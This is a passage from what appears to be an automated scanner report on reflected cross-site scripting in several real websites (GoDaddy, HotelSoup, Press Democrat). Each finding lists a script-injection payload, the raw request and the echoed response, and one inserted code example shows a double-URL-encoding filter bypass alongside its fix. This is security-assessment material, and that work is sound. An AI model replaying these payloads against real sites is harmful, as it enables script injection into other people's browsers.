Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:56 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx&server=CORPWEB185&status=200 OK&querystring=eed19%22%3e%3cscript%3ealert(1)%3c%2fscript%3e7ad57768b1e=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=vaihmdgcxgvgbbodxicfkjgeycogljve; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwords=vaihmdgcxgvgbbodxicfkjgeycogljve; domain=godaddy.com; expires=Sat, 14-Nov-2020 23:28:56 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 327373
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
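Finding 3.286 is the double-URL-encoding bypass described in its remediation note: the web server decodes the parameter name once, a filter that looks for the blocked characters sees only %22%3e%3cscript%3e and passes it, and a second application-level decode restores the "><script> before the value is echoed. The following is an added example, not GoDaddy's code or the scanner's, that models the weak pipeline beside the canonicalise-then-validate order the note recommends. The pipeline functions, the blocked-character set and the two encoded inputs are this example's own assumptions; the inputs are built from the payload the finding records.

```javascript
// Added example, not GoDaddy's code: why a character filter that runs before a
// second URL-decode is bypassable, and the canonicalise-then-validate fix.
// Finding 3.286 submitted %2522%253e%253cscript%253e; the web server decodes it
// once to %22%3e%3cscript%3e, a filter looking for < > " ' sees nothing, and a
// later application-level decode turns it back into "><script>.

// Characters the hypothetical filter refuses (assumed for this example).
const BLOCKED = /[<>"']/;

// The server's single decode, applied before the application sees the value.
function serverDecode(raw) {
  return decodeURIComponent(raw);
}

// The weak pipeline: validate what the server handed over, then decode again
// before echoing (the order the finding implies).
function weakPipeline(rawParamName) {
  const once = serverDecode(rawParamName);
  if (BLOCKED.test(once)) return { rejected: true, echoed: null };
  return { rejected: false, echoed: decodeURIComponent(once) };
}

// Canonicalise first: decode until the value stops changing (bounded, and
// stopping on a malformed %xx rather than throwing), then validate that form.
// The simpler policy of refusing any value that still decodes further after the
// server's decode is equally valid; either way validation comes last.
function canonicalise(value, maxRounds = 3) {
  let cur = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(cur);
    } catch (_) {
      break; // "100%" and similar: not an encoding, leave as is
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// The fixed pipeline: canonicalise, then validate, then echo the canonical form
// (through a context-appropriate encoder in real code).
function fixedPipeline(rawParamName) {
  const canonical = canonicalise(serverDecode(rawParamName));
  if (BLOCKED.test(canonical)) return { rejected: true, echoed: null };
  return { rejected: false, echoed: canonical };
}

// Constructed inputs: the double-encoded parameter name from finding 3.286 and
// its single-encoded equivalent.
const DOUBLE_ENCODED =
  "eed19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ad57768b1e";
const SINGLE_ENCODED =
  "eed19%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e7ad57768b1e";
```

Run against these inputs, weakPipeline rejects SINGLE_ENCODED but echoes DOUBLE_ENCODED as `eed19"><script>alert(1)</script>7ad57768b1e`, which is exactly what the finding reports; fixedPipeline rejects both. The bounded loop in canonicalise matters: an unbounded "decode until stable" loop on attacker input is itself a denial-of-service lever, and a value such as `100%` must be accepted as literal text rather than raise an exception that the caller forgets to handle.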
3.287. http://www.godaddy.com/email/email-hosting.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.godaddy.com
Path: /email/email-hosting.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc22e"onerror%3d"alert(1)"8e83204b2bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc22e"onerror="alert(1)"8e83204b2bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /email/email-hosting.aspx?fc22e"onerror%3d"alert(1)"8e83204b2bd=1 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:30:57 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iife4duravuindjfl2rwhir5; path=/; HttpOnly
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:57 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:57 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:57 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/email-hosting.aspx&server=CORPWEB185&status=200 OK&querystring=fc22e%22onerror%3d%22alert(1)%228e83204b2bd=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 161537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.288. http://www.godaddy.com/hosting/web-hosting.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.godaddy.com
Path: /hosting/web-hosting.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c780"onerror%3d"alert(1)"79da83a095f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c780"onerror="alert(1)"79da83a095f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hosting/web-hosting.aspx?1c780"onerror%3d"alert(1)"79da83a095f=1 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:29:02 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=y13o43be2pe3s33c1weiye55; path=/; HttpOnly
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:29:02 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:29:02 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:29:02 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx&server=CORPWEB185&status=200 OK&querystring=1c780%22onerror%3d%22alert(1)%2279da83a095f=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=eeobbbphjipabdxjydnbcbcijarbvghj; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwords=eeobbbphjipabdxjydnbcbcijarbvghj; domain=godaddy.com; expires=Sat, 14-Nov-2020 23:29:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 327331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.289. http://www.godaddy.com/hosting/website-builder.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.godaddy.com
Path: /hosting/website-builder.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd67"onerror%3d"alert(1)"453233e7a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bd67"onerror="alert(1)"453233e7a72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hosting/website-builder.aspx?4bd67"onerror%3d"alert(1)"453233e7a72=1 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:28:41 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zakbmwnurpis3vin1meaol55; path=/; HttpOnly
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:41 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:41 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:28:41 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=CORPWEB185&status=200 OK&querystring=4bd67%22onerror%3d%22alert(1)%22453233e7a72=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=niebualizeucbhrdufjfnfndvcecueyj; domain=godaddy.com; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 225073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.290. http://www.godaddy.com/ssl/ssl-certificates.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.godaddy.com
Path: /ssl/ssl-certificates.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32c42"onerror%3d"alert(1)"6f7b69a8f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32c42"onerror="alert(1)"6f7b69a8f88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ssl/ssl-certificates.aspx?32c42"onerror%3d"alert(1)"6f7b69a8f88=1 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:30:04 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5wsjlnvcapq4vs45nj3h2b45; path=/; HttpOnly
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:04 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:04 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:30:04 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=CORPWEB185&status=200 OK&querystring=32c42%22onerror%3d%22alert(1)%226f7b69a8f88=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgooglessl=aanfjdxabhdayjjbyfvjgcajcffbqcmf; domain=godaddy.com; expires=Sat, 14-Nov-2020 23:30:04 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 158736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.291. https://www.godaddy.com/gdshop/email.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.godaddy.com
Path: /gdshop/email.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d3df"onerror%3d"alert(1)"9525c6cd90d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d3df"onerror="alert(1)"9525c6cd90d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /gdshop/email.asp?7d3df"onerror%3d"alert(1)"9525c6cd90d=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:50:19 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5m2zzn55zxop1snh3zfrxnnu; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:50:18 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:50:18 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:50:18 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/email-hosting.aspx&server=CORPWEB185&status=200 OK&querystring=7d3df%22onerror%3d%22alert(1)%229525c6cd90d=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 162260
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.292. https://www.godaddy.com/gdshop/hosting/hosting_build_website.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.godaddy.com
Path: /gdshop/hosting/hosting_build_website.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25f27"onerror%3d"alert(1)"81e14d9081f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25f27"onerror="alert(1)"81e14d9081f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /gdshop/hosting/hosting_build_website.asp?25f27"onerror%3d"alert(1)"81e14d9081f=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:34:49 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ogtbab554roamt45wfztyo45; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:34:49 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:34:49 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:34:49 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=CORPWEB185&status=200 OK&querystring=25f27%22onerror%3d%22alert(1)%2281e14d9081f=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Set-Cookie: BlueLithium=hjxbrjqdmdkbbjsgefmhwenenebejjlg; domain=godaddy.com; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 225951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.293. https://www.godaddy.com/gdshop/ssl/ssl.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.godaddy.com
Path: /gdshop/ssl/ssl.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84276"onerror%3d"alert(1)"31ec267e898 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84276"onerror="alert(1)"31ec267e898 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /gdshop/ssl/ssl.asp?84276"onerror%3d"alert(1)"31ec267e898=1 HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 23:41:38 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ynqgouenysfozx45awt02hqx; path=/; HttpOnly Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:41:38 GMT; path=/ Set-Cookie: adc1=US; domain=godaddy.com; path=/ Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:41:38 GMT; path=/ Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 14-Nov-2011 23:41:38 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=CORPWEB185&status=200 OK&querystring=84276%22onerror%3d%22alert(1)%2231ec267e898=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=&referringdomain=; domain=godaddy.com; path=/ Set-Cookie: GoogleADServicesgooglessl=fcsjqakgtjpiaitjaiyjxijgiileaiqd; domain=godaddy.com; expires=Sat, 14-Nov-2020 23:41:38 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 159453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.294. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.hotelsoup.com
Path: /hotel.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cf4f'><script>alert(1)</script>f12adfdb8fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel.php?4cf4f'><script>alert(1)</script>f12adfdb8fc=1 HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.295. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.hotelsoup.com
Path: /hotel.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2264"><script>alert(1)</script>7091e9fcbb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel.php?a2264"><script>alert(1)</script>7091e9fcbb8=1 HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload c0edc<script>alert(1)</script>db5f1a8ae2b was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /hotel.php?query=hotel+san+franciscoc0edc<script>alert(1)</script>db5f1a8ae2b&hsid=hs-4cc8974059987&hss=adwc&&client=ca-dp-godaddy2_xml HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f427"><script>alert(1)</script>bcc6b546b72 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /hotel.php?query=hotel+san+francisco8f427"><script>alert(1)</script>bcc6b546b72&hsid=hs-4cc8974059987&hss=adwc&&client=ca-dp-godaddy2_xml HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db8d"><script>alert(1)</script>7468974be37 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload f07b5<script>alert(1)</script>7962c56bc63 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the n request parameter is copied into the HTML document as plain text between tags. The payload 1f326<script>alert(1)</script>42f179eed7a was submitted in the n parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload a6ad2<script>alert(1)</script>0e367d1dc82 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload a036d<script>alert(1)</script>226d850a15 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4589'%3b3d000edd68f was submitted in the REST URL parameter 3. This input was echoed as e4589';3d000edd68f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/20101114/NEWSe4589'%3b3d000edd68f/101119731/0/business HTTP/1.1 Host: www.pressdemocrat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Cache-Control: max-age=0, s-maxage=0 Content-Length: 62585 Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 15 Nov 2010 00:58:41 GMT Last-Modified: Mon, 15 Nov 2010 00:58:41 GMT Server: Microsoft-IIS/7.0 Set-Cookie: PBCSPERMUSERID=473409061121241; path=/; expires=Mon, 14 Nov 2011 16:58:41 GMT Set-Cookie: PBCSSESSIONID=473409061121241; path=/ X-Passed-To: S260608AT1VW029, URL Rewrite on site N/A (2010-11-14 19:58:41:225) X-Handled-By: S260608AT1VW029, Rewrite on site N/A X-Actual-URL: S260608AT1VW029, (/apps/pbcs.dll/article?AID=/20101114/NEWSe4589'%3b3d000edd68f/101119731/0/business) X-Passed-To-DLL: S260608AT1VW029, (2010-11-14 19:58:41:241) X-Passed-To-BeforeDispatch: S260608AT1VW029, on site SR (2010-11-14 19:58:41:241) X-Returned-From-BeforeDispatch: S260608AT1VW029, on site SR (2010-11-14 19:58:41:459) X-Passed-To-PostProcessResponse: S260608AT1VW029, on site SR (2010-11-14 19:58:53:678) X-Returned-From-PostProcessResponse: S260608AT1VW029, on site SR (2010-11-14 19:58:53:693) X-Returned-From-DLL: S260608AT1VW029 (2010-11-14 19:58:53:693) X-Returned-From: S260608AT1VW029(2010-11-14 19:58:53:693) Date: Mon, 15 Nov 2010 00:58:53 GMT X-Cache: MISS from nysquid01 X-Cache-Lookup: MISS from nysquid01:80 Via: 1.0 nysquid01 (squid/3.0.STABLE18) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
The ar ...[SNIP]... <script type="text/javascript"> function grabUrlOutBrain() { var category = 'NEWSe4589';3d000edd68f'; var url = ''; if (category == 'COMMUNITY') { url = 'http://www.petaluma360.com'; } else { url = 'http://www.pressdemocrat.com'; } // Builds url ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1270'%3bcaf06659bd4 was submitted in the REST URL parameter 4. This input was echoed as c1270';caf06659bd4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/20101114/NEWS/c1270'%3bcaf06659bd4/0/business?Title=Juggler-with-replica-grenade-causes-stir-at-Fisherman-s-Wharf HTTP/1.1 Host: www.pressdemocrat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
